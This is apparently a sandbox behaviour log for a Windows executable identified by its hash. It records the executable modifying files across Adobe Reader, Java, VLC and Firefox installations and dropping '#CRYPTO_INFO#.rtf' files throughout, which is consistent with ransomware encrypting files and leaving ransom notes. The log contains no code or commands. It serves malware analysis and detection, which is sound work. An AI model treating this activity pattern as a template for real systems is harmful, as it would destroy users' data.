8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\jquery.ui.touch-punch.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_email.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\edit-pdf-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.commands_0.10.2.v20140424-2344.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\jmxremote.password.template 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\about.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\comment.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\measure_poster.jpg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-views.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_close.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\currency.data 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\crashreporter.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-down-pressed.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\illustrations.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\release 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\LICENSE.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\MANIFEST.MF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\core_icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_zh_cn_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\sk_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluDCFilesEmpty_180x180.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\20200722122936.pma 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_organize_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\text.cur 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-Bold.otf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.databinding_1.6.200.v20140528-1422.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe.sig 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-text.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.bidi_0.10.0.v20130327-1442.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_de_DE.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_zh_TW.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\update-settings.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Mozilla Firefox\browser\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\README-JDK.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\sunpkcs11.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Mozilla Firefox\uninstall\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\S_ThumbUpOutline_22_N.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-right.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\etc\visualvm.clusters 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-util-lookup_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-windows_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\he-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\core_icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\policytool.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\java-rmi.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme_0.9.300.v20140424-2042.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\bg_pattern_RHP.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-heapdump.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\check-mark-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_ko_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\common.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\next-arrow-default.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Light.pdf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\sunec.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\COPYING.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner.gif 